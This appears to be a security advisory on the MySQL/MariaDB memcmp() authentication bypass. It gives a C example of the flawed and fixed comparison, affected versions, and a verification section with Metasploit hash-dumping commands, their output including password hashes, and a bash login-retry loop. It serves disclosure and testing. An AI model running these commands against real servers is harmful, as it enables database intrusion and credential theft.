When a client connects to MariaDB/MySQL, the password it supplies is compared against the expected correct password. Because the comparison result is handled incorrectly, MySQL can treat the two passwords as identical even when memcmp() returns a nonzero value.

In other words, as long as the username is known, simply retrying the connection is enough to log directly into the SQL database. According to the advisory, roughly one attempt in 256 succeeds. Exploit tools for it have already appeared.
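Added example, not code from the original post or from MySQL: the reported root cause of this bug is that the int returned by memcmp() was stored in a one-byte my_bool, so any return value whose low byte is zero (256, -256, 512, ...) compared as "equal". The code below reproduces that pattern next to the fixed form; wide_memcmp, HASH_LEN and the two sample hashes are constructed for illustration only.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define HASH_LEN 20   /* MySQL compares 20-byte SHA1 digests */
typedef char my_bool; /* one-byte boolean type used by the server */

/* Hypothetical optimized comparison. Like a real libc memcmp() it only
 * promises a nonzero result on mismatch, not -1/0/1. It compares 32-bit
 * little-endian words, so a mismatch in bytes 1..3 is a multiple of 256. */
static int wide_memcmp(const uint8_t *a, const uint8_t *b, size_t n)
{
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t wa = a[i] | (uint32_t)a[i+1] << 8 | (uint32_t)a[i+2] << 16 | (uint32_t)a[i+3] << 24;
        uint32_t wb = b[i] | (uint32_t)b[i+1] << 8 | (uint32_t)b[i+2] << 16 | (uint32_t)b[i+3] << 24;
        if (wa != wb)
            return (int)(wa - wb); /* nonzero, but not limited to one byte */
    }
    for (; i < n; i++)
        if (a[i] != b[i]) return a[i] - b[i];
    return 0;
}

/* Vulnerable pattern: the int is narrowed to my_bool (one byte), so a result
 * such as -256 becomes 0, which the caller reads as "hashes match". */
static my_bool check_scramble_buggy(const uint8_t *got, const uint8_t *expected)
{
    return wide_memcmp(got, expected, HASH_LEN);
}

/* Fixed pattern: collapse to 0/1 before the narrowing conversion happens. */
static my_bool check_scramble_fixed(const uint8_t *got, const uint8_t *expected)
{
    return wide_memcmp(got, expected, HASH_LEN) != 0;
}

/* Constructed sample: the stored hash and a wrong one differing only in byte 1. */
static const uint8_t stored[HASH_LEN] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20};
static const uint8_t wrong[HASH_LEN]  = {1,3,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20};

/* True when the check reports a match (0 means "equal", as in MySQL). */
static bool accepted(my_bool (*check)(const uint8_t *, const uint8_t *), const uint8_t *cand)
{
    return check(cand, stored) == 0;
}

int main(void)
{
    printf("buggy check accepts wrong hash: %d\n", accepted(check_scramble_buggy, wrong));
    printf("fixed check accepts wrong hash: %d\n", accepted(check_scramble_fixed, wrong));
    return 0;
}
```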
Affected products:
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
Verification method:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes…
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>